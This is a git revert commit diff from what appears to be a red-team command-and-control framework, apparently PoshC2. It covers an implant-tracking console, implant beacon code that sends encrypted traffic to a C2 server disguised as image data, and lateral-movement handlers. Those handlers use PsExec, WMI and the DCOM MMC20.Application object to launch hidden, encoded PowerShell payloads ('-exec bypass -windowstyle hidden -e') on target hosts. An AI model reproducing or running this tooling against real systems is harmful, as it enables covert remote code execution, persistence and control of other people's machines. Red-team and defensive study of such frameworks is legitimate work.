This reverts commit 7231d9026d, reversing
changes made to d352a8e6e7.
chunking
rolen 2019-01-21 09:47:35 +00:00
parent 7231d9026d
commit 9f8b17f6a6
6 changed files with 1524 additions and 2849 deletions

View File

@ -3,7 +3,6 @@
from Colours import *
from Config import *
from DB import *
from Help import *
import time, os
rows = 10
@ -17,10 +16,8 @@ try:
except Exception as e:
print "cls"
print chr(27) + "[2J"
print (Colours.GREEN + "")
print (logopic)
print (Colours.END + "")
print Colours.GREEN,""
print logo, Colours.END
try:
taskid = get_seqcount("CompletedTasks") + 1
@ -40,7 +37,6 @@ except Exception as e:
user = "None"
implantid = 1
print newtaskid
while(1):
try:
newtask = get_newtasksbyid(newtaskid)
@ -56,10 +52,10 @@ while(1):
print "Loading Shellcode",Colours.END
elif "upload-file" in command.lower():
print "Uploading File",Colours.END
else:
else:
print command,Colours.END
newtaskid = newtaskid + 1
newtaskid = newtaskid + 1
except Exception as e:
user = "None"
@ -69,9 +65,9 @@ while(1):
now = datetime.datetime.now()
if hostinfo:
print Colours.GREEN
print "Command returned against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
print "Command returned against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
print completedtask[4],Colours.END
taskid = taskid + 1
taskid = taskid + 1
except Exception as e:
user = "None"
@ -80,12 +76,12 @@ while(1):
if implant:
print Colours.GREEN
print "New %s implant connected: (uri=%s key=%s) (%s)" % (implant[15], implant[1], implant[5], now.strftime("%m/%d/%Y %H:%M:%S"))
print "%s | URL:%s | Time:%s | PID:%s | Sleep:%s | %s (%s) " % (implant[4], implant[9], implant[6],
print "%s | URL:%s | Time:%s | PID:%s | Sleep:%s | %s (%s) " % (implant[4], implant[9], implant[6],
implant[8], implant[13], implant[11], implant[10])
print Colours.END
implantid = implantid + 1
implantid = implantid + 1
except Exception as e:
user = "None"
time.sleep(1)

View File

@ -67,8 +67,6 @@ public class Program
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
} else {
x.UseDefaultCredentials = true;
}
var df = "#REPLACEDF#";

View File

@ -242,8 +242,6 @@ while(True):
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
opener = urllib2.build_opener()
if (len(cmd) > 200):
cmd = cmd[0:200]
postcookie = encrypt(key, cmd)
data = base64.b64decode(random.choice(icoimage))
dataimage = data.ljust( 1500, '\\0' )

View File

@ -317,7 +317,7 @@ def startup(printhelp = ""):
for t in comtasks:
hostname = get_implantdetails(t[2])
if hostname[2] not in users:
users += "%s @ %s\n" % (hostname[2],hostname[3])
users += "%s \n" % hostname[2]
if "Upload-File" in t[3]:
uploadedfile = t[3]
uploadedfile = uploadedfile.partition("estination ")[2]
@ -350,7 +350,7 @@ def startup(printhelp = ""):
else:
for task in tasks:
imname = get_implantdetails(task[1])
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
alltasks += "(%s) %s\r\n" % ("%s" % (imname[11]),task[2])
startup("Queued tasks:\r\n\r\n%s" % alltasks)
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
@ -824,14 +824,18 @@ def runcommand(command, randomuri):
elif "invoke-psexecproxypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
C2 = get_c2server_all()
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, randomuri)
else:
startup("Need to run createproxypayload first")
elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri)
@ -861,14 +865,18 @@ def runcommand(command, randomuri):
elif "invoke-wmiproxypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
C2 = get_c2server_all()
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, randomuri)
else:
startup("Need to run createproxypayload first")
elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
@ -897,16 +905,15 @@ def runcommand(command, randomuri):
# dcom lateral movement
elif "invoke-dcomproxypayload" in command.lower():
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
p = re.compile(ur'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
new_task(pscommand, randomuri)
else:
startup("Need to run createproxypayload first")
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(ur'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, randomuri)
elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")

File diff suppressed because it is too large Load Diff

0
Modules/Invoke-DaisyChain.ps1 Normal file → Executable file
View File